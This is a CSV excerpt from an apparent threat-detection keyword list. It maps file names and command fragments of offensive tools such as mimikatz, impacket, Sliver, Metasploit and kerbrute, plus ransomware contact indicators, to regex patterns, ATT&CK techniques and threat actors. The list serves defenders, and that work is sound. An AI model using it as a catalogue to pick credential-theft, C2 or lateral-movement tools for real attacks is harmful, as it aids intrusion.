"*ropfuscator *",".{0,1000}ropfuscator\s.{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","0","N/A","N/A","N/A","5","426","32","2024-05-08T20:06:11Z","2021-11-16T18:13:57Z","57474"
"*ROPfuscator*",".{0,1000}ROPfuscator.{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","N/A","5","426","32","2024-05-08T20:06:11Z","2021-11-16T18:13:57Z","57475"
"*ropfuscator-*",".{0,1000}ropfuscator\-.{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","N/A","5","426","32","2024-05-08T20:06:11Z","2021-11-16T18:13:57Z","57476"
"*ropfuscator.*",".{0,1000}ropfuscator\..{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","N/A","5","426","32","2024-05-08T20:06:11Z","2021-11-16T18:13:57Z","57477"
"*ropnop/go-windapsearch*",".{0,1000}ropnop\/go\-windapsearch.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57478"
"*ropnop/kerbrute*",".{0,1000}ropnop\/kerbrute.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","57479"
"*roselondon@cock.li*",".{0,1000}roselondon\@cock\.li.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","57480"
"*rotarydrone/GlobalUnProtect*",".{0,1000}rotarydrone\/GlobalUnProtect.{0,1000}","offensive_tool_keyword","GlobalUnProtect","Decrypt GlobalProtect configuration and cookie files.","T1552 - T1003 - T1555","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rotarydrone/GlobalUnProtect","1","1","N/A","N/A","9","2","147","19","2024-09-10T20:19:24Z","2024-09-04T15:31:52Z","57481"
"*rotateproxy.exe *",".{0,1000}rotateproxy\.exe\s.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","57482"
"*rotateproxy.Info(*",".{0,1000}rotateproxy\.Info\(.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","57483"
"*rottenpotato.x64.dll*",".{0,1000}rottenpotato\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","57484"
"*rottenpotato.x86.dll*",".{0,1000}rottenpotato\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","57485"
"*RottenPotatoVulnerable.txt*",".{0,1000}RottenPotatoVulnerable\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","57486"
"*RouterPassView.exe*",".{0,1000}RouterPassView\.exe.{0,1000}","offensive_tool_keyword","RouterPassView","help you to recover your lost password from your router file","T1002 - T1552 - T1027","TA0006 - TA0007","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/router_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57487"
"*routerpassview.zip*",".{0,1000}routerpassview\.zip.{0,1000}","offensive_tool_keyword","RouterPassView","help you to recover your lost password from your router file","T1002 - T1552 - T1027","TA0006 - TA0007","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/router_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57488"
"*routerpasswords.com/*",".{0,1000}routerpasswords\.com\/.{0,1000}","offensive_tool_keyword","routerpasswords.com","find default routers passwords","T1110.003 - T1200","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","1","N/A","N/A","N/A","10","1594","198","2025-04-16T21:16:51Z","2021-08-16T17:34:25Z","57489"
"*routers_userpass.txt*",".{0,1000}routers_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","57490"
"*routersploit*",".{0,1000}routersploit.{0,1000}","offensive_tool_keyword","routersploit","The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.exploits","T1210.001 - T1190 - T1213 - T1189","TA0007 - TA0002 - TA0001 - TA0011","N/A","N/A","Framework","https://github.com/threat9/routersploit","1","1","N/A","N/A","N/A","10","12482","2333","2025-04-17T11:19:16Z","2016-03-30T11:43:12Z","57491"
"*RowTeam/SharpDecryptPwd*",".{0,1000}RowTeam\/SharpDecryptPwd.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","1","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","57492"
"*royal2xthig3ou5hd7zsliqagy6yygk2cdelaxtni2fyad6dpmpxedid.onion*",".{0,1000}royal2xthig3ou5hd7zsliqagy6yygk2cdelaxtni2fyad6dpmpxedid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","57493"
"*rpc.Merlin.Exe*",".{0,1000}rpc\.Merlin\.Exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","57494"
"*rpc.Merlin.RunAs*",".{0,1000}rpc\.Merlin\.RunAs.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","57495"
"*rpc://* -rpc-mode ICPR -icpr-ca-name *",".{0,1000}rpc\:\/\/.{0,1000}\s\-rpc\-mode\sICPR\s\-icpr\-ca\-name\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","57496"
"*rpc::enum*",".{0,1000}rpc\:\:enum.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","57497"
"*rpc::server*",".{0,1000}rpc\:\:server.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","57498"
"*rpcattack.py*",".{0,1000}rpcattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","57502"
"*rpcattack.py*",".{0,1000}rpcattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","57503"
"*rpc-backdoor.go*",".{0,1000}rpc\-backdoor\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","57505"
"*rpc-beacons.go*",".{0,1000}rpc\-beacons\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","57506"
"*rpcdump.py * | grep MS-RPRN*",".{0,1000}rpcdump\.py\s.{0,1000}\s\|\sgrep\sMS\-RPRN.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","57510"
"*rpcdump.py*",".{0,1000}rpcdump\.py.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","1","N/A","N/A","7","1","80","7","2024-09-13T12:50:50Z","2023-12-14T14:31:05Z","57511"
"*rpcdump.py*",".{0,1000}rpcdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","57512"
"*rpcdump_check*",".{0,1000}rpcdump_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","57513"
"*rpc-hijack.go*",".{0,1000}rpc\-hijack\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","57516"
"*rpc-kill.go*",".{0,1000}rpc\-kill\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","57518"
"*rpcmap.py*",".{0,1000}rpcmap\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","57519"
"*rpc-msf.go*",".{0,1000}rpc\-msf\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","57520"
"*rpcrelayclient.*",".{0,1000}rpcrelayclient\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","57528"
"*rpcrelayclient.py*",".{0,1000}rpcrelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","57529"
"*rpcrt4_new.dll*",".{0,1000}rpcrt4_new\.dll.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/websecnl/CVE-2022-26809","1","1","N/A","N/A","N/A","1","26","3","2022-04-19T17:04:04Z","2022-04-14T08:12:24Z","57530"
"*rpcrt4_old.dll",".{0,1000}rpcrt4_old\.dll","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/websecnl/CVE-2022-26809","1","1","N/A","N/A","N/A","1","26","3","2022-04-19T17:04:04Z","2022-04-14T08:12:24Z","57531"
"*RpcSharpClient.exe --protocol namedpipe *",".{0,1000}RpcSharpClient\.exe\s\-\-protocol\snamedpipe\s.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","57532"
